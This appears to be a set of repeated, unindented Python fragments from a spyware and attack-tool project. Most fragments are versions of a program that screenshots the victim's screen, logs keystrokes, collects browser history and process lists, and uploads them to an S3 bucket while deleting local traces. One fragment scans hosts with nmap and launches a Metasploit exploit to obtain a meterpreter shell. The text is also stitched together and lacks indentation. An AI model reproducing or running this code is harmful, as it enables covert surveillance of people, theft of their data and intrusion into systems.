def main(args):
duration = args.duration
interval = args.interval
output_dir = args.output_dir
s3_bucket = args.s3_bucket
if not os.path.isdir(output_dir):
print('Output directory is not a directory.')
return
cur_date = datetime.now()
end_date = timedelta(days=duration) + cur_date
delta = timedelta(seconds=interval)
while cur_date <= end_date:
im = screenshot.grab()
file_name = 'spyware-' + cur_date.strftime("%m-%d-%M-%S") + '.png'
fp = output_dir + '/' + file_name
im.save(fp)
# save to the cloud and rm file locally
if s3_bucket != "":
utils.save_to_s3(fp, file_name)
os.remove(fp)
cur_date += delta
def put_data(key):
old_data = get_all_data_from_s3()
data = request.json
old_data[key] = data['value']
with open('data.json', 'w') as f:
json.dump(old_data, f)
save_to_s3('data.json')
return '200'
def main(args):
# Describes what is happening
print(
"This spyware is takes a screeshot of the computer it is running on every 10 seconds."
)
print(
"There is also a keylogging feature keeping track of each key pressed."
)
print(
"It is probably taking screenshots of your screen right now as you are reading this. :)"
)
duration = args.duration
interval = args.interval
output_dir = args.output_dir
s3_bucket = args.s3_bucket
if not os.path.isdir(output_dir):
print('Output directory is not a directory.')
return
cur_date = datetime.now()
end_date = timedelta(days=duration) + cur_date
delta = timedelta(seconds=interval)
# creates directories
if s3_bucket == "":
os.mkdir(output_dir + '/outputs')
os.mkdir(output_dir + '/outputs/screenshots')
browserhistDict = inputBrowser()
file = open(output_dir + '/outputs/history.txt', 'w')
file.write(json.dumps(browserhistDict))
file.close()
else:
browserhistDict = inputBrowser()
file = open(output_dir + '/history.txt', 'w')
file.write(json.dumps(browserhistDict))
utils.save_to_s3(output_dir + '/history.txt', "history")
os.remove(output_dir + '/history.txt')
file.close()
while cur_date <= end_date:
im = screenshot.grab()
file_name = 'spyware-' + cur_date.strftime("%m-%d-%M-%S") + '.png'
fp = output_dir + '/outputs/screenshots' + '/' + file_name
#save payloads to s3
if s3_bucket != "":
utils.save_to_s3(fp, file_name)
os.remove(fp)
else: #save all payloads (keylogger, history, output files) to output dir
im.save(fp)
time.sleep(int(interval))
cur_date += delta
def main(args):
# Describes what is happening
print(
"This spyware is takes a screeshot of the computer it is running on every 10 seconds."
)
print(
"There is also a keylogging feature keeping track of each key pressed."
)
print(
"It is probably taking screenshots of your screen right now as you are reading this. :)"
)
duration = args.duration
interval = args.interval
output_dir = args.output_dir
s3_bucket = args.s3_bucket
if not os.path.isdir(output_dir):
print('Output directory is not a directory.')
return
cur_date = datetime.now()
end_date = timedelta(days=duration) + cur_date
delta = timedelta(seconds=interval)
os.mkdir(output_dir + '/outputs')
os.mkdir(output_dir + '/outputs/screenshots')
os.mkdir(output_dir + '/outputs/keylogs')
#arguments for the ten_second_passed thread
kwargs = {'output_dir': output_dir, 's3_bucket': s3_bucket}
#TODO: make daemon
upload_thread = Thread(target=ten_seconds_passed, kwargs=kwargs)
upload_thread.start()
#start the KeyLogger
#TODO: pass output_dir to constructor to save logs from there instead of doing so in thread
keylogger = KeyLogger()
while cur_date <= end_date:
im = screenshot.grab()
file_name = 'spyware-' + cur_date.strftime("%m-%d-%M-%S") + '.png'
fp = output_dir + '/outputs/screenshots' + '/' + file_name
#save payloads to s3
if s3_bucket != "":
utils.save_to_s3(fp, file_name)
os.remove(fp)
else: #save all payloads (keylogger, history, output files) to output dir
im.save(fp)
time.sleep(int(interval))
cur_date += delta
def ten_seconds_passed(output_dir, s3_bucket):
while True:
time.sleep(10)
edit_lock.acquire()
if not hasChanged:
cur_date = datetime.now()
file_name = 'spyware-' + cur_date.strftime("%m-%d-%M-%S") + '.log'
fp = output_dir + '/outputs/keylogs' + '/' + file_name
#move output file to output directory
os.rename(os.getcwd() + '\\output.txt', fp)
#save payloads to s3
if s3_bucket != "":
utils.save_to_s3(fp, file_name)
os.remove(os.getcwd() + '\\output.txt')
os.remove(fp)
hasChanged = True
edit_lock.release()
def main(args):
# Describes what is happening
print(
"This spyware is takes a screeshot of the computer it is running on every 10 seconds."
)
print(
"There is also a keylogging feature keeping track of each key pressed."
)
print(
"It is probably taking screenshots of your screen right now as you are reading this. :)"
)
duration = args.duration
interval = args.interval
output_dir = args.output_dir
s3_bucket = args.s3_bucket
if not os.path.isdir(output_dir):
print('Output directory is not a directory.')
return
cur_date = datetime.now()
end_date = timedelta(days=duration) + cur_date
delta = timedelta(seconds=interval)
# creates directories
if s3_bucket == "":
os.mkdir(output_dir + '/outputs')
os.mkdir(output_dir + '/outputs/screenshots')
os.mkdir(output_dir + '/outputs/keylogs')
browserhistDict = inputBrowser()
file = open(output_dir + '/outputs/history.txt', 'w')
file.write(json.dumps(browserhistDict))
file.close()
else:
browserhistDict = inputBrowser()
file = open(output_dir + '/history.txt', 'w')
file.write(json.dumps(browserhistDict))
utils.save_to_s3(output_dir + '/history.txt', "history.txt")
os.remove(output_dir + '/history.txt')
file.close()
# if you would like to run this on MacOS
# You have to disable to keylogging aspect because
# it is not supported. PyHook works on windows and linux
# Prefer linux. Windows might be more error prone
# Please comment the sections inside the two breaks '****'
# https://stackoverflow.com/questions/10994750/something-like-pyhook-on-os-x
# ************************
#arguments for the ten_second_passed thread
kwargs = {'output_dir': output_dir, 's3_bucket': s3_bucket}
#TODO: make daemon
upload_thread = Thread(target=ten_seconds_passed, kwargs=kwargs)
upload_thread.start()
#start the KeyLogger
#TODO: pass output_dir to constructor to save logs from there instead of doing so in thread
keylogger = KeyLogger()
# ************************
processes_seen = []
fcreate = open(output_dir + "/outputs/processes.txt", "w")
fcreate.close()
while cur_date <= end_date:
im = screenshot.grab()
file_name = 'spyware-' + cur_date.strftime("%m-%d-%M-%S") + '.png'
fp = output_dir + '/outputs/screenshots' + '/' + file_name
f = open(output_dir + "/outputs/processes.txt", "a")
changed = False
for process in psutil.process_iter():
processInfo = process.as_dict(attrs=['pid', 'name', 'create_time'])
processID = processInfo['pid']
processName = processInfo['name']
if processName not in processes_seen:
processCreationTime = time.strftime(
'%d-%m-%Y %H:%M:%S',
time.localtime(processInfo['create_time']))
f.write(
f'{processCreationTime}: process_name: {processName} pid: {processID}\n'
)
processes_seen.append(processName)
changed = True
#save payloads to s3
if s3_bucket != "":
utils.save_to_s3(fp, file_name)
os.remove(fp)
if changed:
utils.save_to_s3(output_dir + "/outputs/processes.txt",
"processes.txt")
else: #save all payloads (keylogger, history, output files) to output dir
im.save(fp)
time.sleep(int(interval))
cur_date += delta
if s3 != "":
os.remove(output_dir + "/outputs/processes.txt")
def main():
global cid
global client
client.consoles.console(cid).write("db_status")
print("""
______ ______ ______ ______ ______
/\__ _\ /\ == \ /\ __ \ /\ ___\ /\__ _\
\/_/\ \/ \ \ __< \ \ __ \ \ \ __\ \/_/\ \/
\ \_\ \ \_\ \_\ \ \_\ \_\ \ \_\ \ \_\
\/_/ \/_/ /_/ \/_/\/_/ \/_/ \/_/
""")
parser = argparse.ArgumentParser(
description='Tool for host discovery and vulnerability scanning.')
parser.add_argument("-s",
"--subnet",
action="store",
dest='subnet',
help="range of IP addresses")
parser.add_argument("-t",
"--target",
action="store",
dest='target',
help="target IP address")
parser.add_argument("-s3",
"--s3_bucket",
default="",
help="The s3 bucket for the report.")
args = parser.parse_args()
if args.subnet == None and args.target == None:
print('No inputs provided, please use -h for usage information.')
elif args.subnet != None and args.target != None:
print('Too many inputs provided, please use -h for usage information.')
elif args.subnet != None:
print('Running Subnet Scan...\n')
report.write("Performing SUBNET SCAN on " + args.subnet + "\n")
hosts = subnet_nmap_scan(args.subnet)
print('Found the following hosts: ' + str(hosts) + "\n")
report.write("Live hosts on SUBNET: " + str(hosts) + "\n\n")
for host in hosts:
print('Running Target Scan on host ' + str(host) + '...\n')
target_nmap_scan(host)
scan_result = target_nmap_scan(host)
if not scan_result:
print('No vulnerabilities found.\n')
print()
else:
# run the exploits returned by scan_results.
# one proof of concept exploit is currently supported.
# takes some domain knowledge, research and manual testing to write this.
#TODO: create a dictionary
# {exploit -> supported_exploit_method_name}
# {'exploit/windows/http/manageengine_connectionid_write': manageengine_connectionid_write}
meterpreter = exploits.manageengine_connectionid_write(
rhosts="172.28.128.3", rport="8022", lhosts="172.28.128.1")
if meterpreter:
report.write(
"GOT SHELL ACCESS! Your target is done for muahahaha")
report.write("Running `sysinfo`: ")
report.write(meterpreter.run_with_output('sysinfo'))
elif args.target != None:
print('Running Target Scan on host ' + str(args.target) + '...\n')
report.write("Performing TARGET SCAN on " + args.target + "\n\n")
scan_result = target_nmap_scan(args.target)
if not scan_result:
print('No vulnerabilities found.\n')
else:
# run the exploits returned by scan_results.
# one proof of concept exploit is currently supported.
# takes some domain knowledge, research and manual testing to write this.
meterpreter = exploits.manageengine_connectionid_write(
rhosts="172.28.128.3", rport="8022", lhosts="172.28.128.1")
if meterpreter:
report.write(
"GOT SHELL ACCESS! Your target is done for muahahaha")
report.write("Running `sysinfo`: ")
report.write(meterpreter.run_with_output('sysinfo'))
report.close()
if s3 != "":
utils.save_to_s3(filename + ".txt", "Traft_Report.txt")
os.remove(filename + ".txt")
def main(args):
# Describes what is happening
print(
"This spyware is takes a screeshot of the computer it is running on every 10 seconds."
)
print(
"There is also a keylogging feature keeping track of each key pressed."
)
print(
"It is probably taking screenshots of your screen right now as you are reading this. :)"
)
duration = args.duration
interval = args.interval
output_dir = args.output_dir
s3_bucket = args.s3_bucket
if not os.path.isdir(output_dir):
print('Output directory is not a directory.')
return
cur_date = datetime.now()
end_date = timedelta(days=duration) + cur_date
delta = timedelta(seconds=interval)
# creates directories
if s3_bucket == "":
os.mkdir(output_dir + '/outputs')
os.mkdir(output_dir + '/outputs/screenshots')
browserhistDict = inputBrowser()
file = open(output_dir + '/outputs/history.txt', 'w')
file.write(json.dumps(browserhistDict))
file.close()
else:
browserhistDict = inputBrowser()
file = open(output_dir + '/history.txt', 'w')
file.write(json.dumps(browserhistDict))
utils.save_to_s3(output_dir + '/history.txt', "history")
os.remove(output_dir + '/history.txt')
file.close()
processes_seen = []
fcreate = open(output_dir + "/outputs/processes.txt", "w")
fcreate.close()
while cur_date <= end_date:
im = screenshot.grab()
file_name = 'spyware-' + cur_date.strftime("%m-%d-%M-%S") + '.png'
fp = output_dir + '/outputs/screenshots' + '/' + file_name
f = open(output_dir + "/outputs/processes.txt", "a")
changed = False
for process in psutil.process_iter():
processInfo = process.as_dict(attrs=['pid', 'name', 'create_time'])
processID = processInfo['pid']
processName = processInfo['name']
if processName not in processes_seen:
processCreationTime = time.strftime(
'%d-%m-%Y %H:%M:%S',
time.localtime(processInfo['create_time']))
f.write(
f'{processCreationTime}: process_name: {processName} pid: {processID}\n'
)
processes_seen.append(processName)
changed = True
#save payloads to s3
if s3_bucket != "":
utils.save_to_s3(fp, file_name)
os.remove(fp)
if changed:
utils.save_to_s3(output_dir + "/outputs/processes.txt",
"processes")
else: #save all payloads (keylogger, history, output files) to output dir
im.save(fp)
time.sleep(int(interval))
cur_date += delta
if s3 != "":
os.remove(output_dir + "/outputs/processes.txt")